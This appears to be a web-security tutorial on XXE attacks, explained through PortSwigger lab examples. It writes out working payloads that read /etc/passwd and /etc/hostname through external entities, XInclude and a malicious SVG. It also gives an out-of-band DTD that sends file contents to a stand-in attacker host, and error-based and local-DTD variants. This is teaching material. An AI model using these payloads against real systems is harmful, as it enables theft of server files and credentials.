XML External Entity (XXE)

XXE is a vulnerability that can occur when the application processes XML data. When present, it may allow an attacker to view files from the app server or even interact with the back end or external systems.

XML and entities

XML (or “extensible markup language”) is a language that allow the storage and transmission of data and use a tree-like structure using tag (such as HTML). However, XML doesn’t use predefined tags, so they can have have any name.

An XML entity is a way to reference data within the XML document instead of using the data itself. For example, the entities &lt and &gt represent < and > respectively. It is possible to create custom entities within the DTD.

<!DOCTYPE test [ <!ENTITY testentity "the value" > ]>

If later we use &testentity in the document, when processed will be replaced with “the value”

DTD or Document type Definition contains information about how the XML document is structured, types of data value it can contain, and other item. It is declared within the DOCTYPE element at the start of the document.

A external entity is when the value that the entity will have is outside of the DTD where it is being declared. To declare a external entity you need to use the SYSTEM keyword and then the URL from which the value should be obtained. We can use the [file://](file://) to extract the value from a file. This mean that we could declare this entity:

<!DOCTYPE test [ <!ENTITY passwords SYSTEM "file:///etc/passwd" > ]>

XXE attacks

If an attacker can modify an XML file that will be processed by the server, if external entities are permitted, attacks such as retrieving sensitive information or performing Server Side Request Forgery could be possible.

Retrieving information

If we can modify the DOCTYPE element to declare a external entity and edit a data value within the XML to make use of the external entity we just declared, we could try to retrieve files.

Let’s use an example using Portswigger’s Labs. In this webpage, if we want to check the stock of a product, this XML is sent to the server.

We can intercept the request and modify it. We will add a DOCTYPE element declaring an external entity which value is the content of /etc/passwd . Then, instead of the product id number, let’s reference the external entity we just declared.

As we can see in the response, where the server wants to write the productID , we get the contents of the file.

What happens if the application doesn’t return any values but till proceses what we sent? We won’t be able to see the exfiltrated data in de reponse, implying that we are facing of a Blind XXE vulnerability.

When facing a Blind XXE vulnerability, we have two ways of trying to get the information:

Generating an error that could contain the information within the error message
Trigger out-of-band network interactions, sometimes exfiltrating sensitive data within the interaction data.

It works as all the out of band techniques. The main goal is make the server interact with a host controlled by the attacker. The attacker can log the requests that the server receive, so the intention is to inject the data that we want to exfiltrate within the request.

For the XXE case, the malicious host needs to contain a malicious DTD file. Remember that a DTD is a file that defines the structure and the legal elements and attributes of an XML document.

This DTD will contain a total of 3 entities. Imagine this example

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;

This DTD works as follows:

Defines an XML parameter entity called file, containing the contents of the /etc/passwd file.
Defines an XML parameter entity called eval, containing a dynamic declaration of another XML parameter entity called exfiltrate. Note that for this stacked entity, instead of % we have to use % .The exfiltrate entity will be evaluated by making an HTTP request to the attacker’s web server containing the value of the file entity within the URL query string (and exfiltrating the data).
Uses the eval entity, which causes the dynamic declaration of the exfiltrate entity to be performed.
Uses the exfiltrate entity, so that its value is evaluated by re questing the specified URL.

You may be wondering: “Why we need to nest the exfiltrate entity within the eval entity?” The reason for this is because if we try to reference a entity within another entity with the “%”, it won’t work, so http://web-attacker.com/?x=%file will be evaluated as http://web-attacker.com/?x=%file , without replacing the %file with the data that we want to exfiltrate. However, by nesting it inside the eval entity, when evaluating eval, a the nested exfiltrate entity will be declared and is in this process where the %file will be replaced by the actual data. Later, when we evaluate the exfiltrate entity, this will already contain all the data instead of %file .

Once this file exist and is public (lets assume a hostname such as attacker.com), the idea is to inject code in the request containing the vulnerable XML to retrieve this file and interpret it.

If we inject this:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM
"http://attacker.com/malicious.dtd"> %xxe;]>

The xxe entity is declared as the contents of the malicious DTD file hosted in the attacker server. Once the xxe entity is used (%xxe), all the contents of the malicious DTD file will be interpreted too and the exfiltration will take place.

You may we wondering why we need to create a external DTD if we could add those entities directly in the XML request. The problem is that, per XML specification, the declaration of entities within other entities (stacked entities) are only allowed in external DTD.

Blind XXE: Error messages

With this other solution, we try to generate a parsing error where the error message contains the contents that we want to retrieve. Note that this will only work if the error message is returned.

Imagine this example:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

Defines an XML parameter entity called file, containing the contents of the /etc/passwd file.
Defines an XML parameter entity called eval, containing a dynamic declaration of another XML parameter entity called error. The error entity will be evaluated by loading a nonexistent file whose name contains the value of the file entity.
Uses the eval entity, which causes the dynamic declaration of the error entity to be performed.
Uses the error entity, so that its value is evaluated by attempting to load the nonexistent file, resulting in an error message containing the name of the nonexistent file, which is the contents of the /etc/passwd file.

Note that the attacker also requires a server to host this DTD file, since nested entities are only available whit external DTD files.

What happens if an out of band connection is not allowed (it may be blocked by a firewall)? We still have a chance to exploit it if it uses an external DTD but hosted locally. The XML language specification has a loophole where if it uses a hybrid of internal and external DTD, the restriction of declare entities within entities is relaxed. This implies that we can trigger a error based xxe without the need of hosting a malicious DTD in a host controlled by the attacker. The attack involves invoking a DTD file that happens to exist on the local filesystem and repurposing it to redefine an existing entity in a way that triggers a parsing error containing sensitive data.

In this example, imagine that the schema.dtd file defines an entity named custom_entity :

<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
<!ENTITY % custom_entity '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>

We load a external DTD that exists in the local filesystem by declaring the local_dtd entity.
In this local_dtd the custim_entity is already defined, but we redefine it containing the error xxe.
Finally, we use the local_dtd entity, so that the external DTD is interpreted, including the redefined value of the custom_entity entity. This results in the desired error message.

To exploit this, you must know the path of a valid DTD file existing within the local filesystem.

XInclude

We may be missing XXE vulnerabilities if we just search for XML code in the HTTP traffic. Some applications may just send the data and it is embedded into a XML doc on the server side.

In this situation we can’t inject entities because we can’t control the DOCTYPE element. However, we can use the XInclude standard instead. XInclude is a way to include other files (or portions of other files) into a single XML file.

You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.

To make use of the XInclude functionality, we have to use the xi:include element.

The xi is a prefix that has to be related with a namespace, using the xmlns attribute.

The term xmlns stands for “XML namespace.” Namespaces are used to avoid element name conflicts between different markup vocabularies or between elements in the same vocabulary but defined in different contexts.

When you define a namespace for an XML element using the xmlns attribute, you are essentially creating a unique identifier for that element’s content. This allows different markup languages or vocabularies to be combined within a single XML document without causing naming collisions.

The http://www.w3.org/2001/XInclude namespace is used to indicate that the XML document is utilizing the elements and attributes defined in the XInclude standard.

For example, if the XML document contains an element like <xi:include>, the XML parser knows that this refers to an element defined within the http://www.w3.org/2001/XInclude namespace. The parser can then apply the specific rules and behavior defined by the XInclude standard to process and handle this element appropriately.

Here’s an example of how the XInclude namespace might be used in an XML document and exfiltrate data:

  
<root xmlns:xi="http://www.w3.org/2001/XInclude">
    <xi:include href="file:///etc/passwd" parse="text"/>
</root>

In this example, the xi:include element, with the href attribute specifying the location of the external document to be included, is used within the context of the http://www.w3.org/2001/XInclude namespace. We must use the parse="text" attribute because we are not including an XML file.

File Upload

Certain software applications permit users to upload files that are subsequently handled by the server. Many standard file formats incorporate XML or contain XML subcomponents. Common examples of such XML-based formats include various office document formats like DOCX and image formats such as SVG.

For instance, consider an application that allows users to upload images, intending to process or validate them on the server post-upload. While the application might anticipate receiving standard formats such as PNG or JPEG, the underlying image processing library could potentially support SVG images. Since the SVG format is XML-based, a malicious actor could exploit this capability by submitting a malevolent SVG image, thereby exposing an attack surface susceptible to XML External Entity (XXE) vulnerabilities.

For example, this is a valid svg image that tries to exploit a xxe:

  
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
<svg viewBox="0 0 200 200" width="100"  height="100" xmlns="http://www.w3.org/2000/svg">
	<text font-size="16" x="0" y="16">&xxe;</text>
</svg>

In this Lab example, we can upload a profile picture. If we upload a svg image with the code that we just mentioned, we can then inspect the processed picture and retrieve the hostname:

Modifying the Content Type Header

Most POST requests use a default content type that is generated by HTML forms, such as application/x-www-form-urlencoded. Even though the server may be expecting to receive a response with this format, it may also accept other content types.

You can try to modify the Content-Type header and use text/xml .

For example, this request:

  
POST /action HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

variable=value

It might be possible to achieve a similar outcome by submitting the following request:

  
POST /action HTTP/1.1
Host: example.com
Content-Type: text/xml
Content-Length: 52

<?xml version="1.0" encoding="UTF-8"?>
<root>
   <variable>value</variable>
</root>

If the application tolerates requests containing XML in the message body, and parses the body content as XML, then you can reach the hidden XXE attack surface simply by reformatting requests to use the XML format.

XML External Entity

XML External Entity (XXE)

XML and entities

XXE attacks

Retrieving information

Blind XXE: Out of band interaction

Blind XXE: Error messages

XInclude

File Upload

Modifying the Content Type Header

Further Reading

Single-packet Attack

Race Conditions

Cross-Origin Resource sharing (CORS)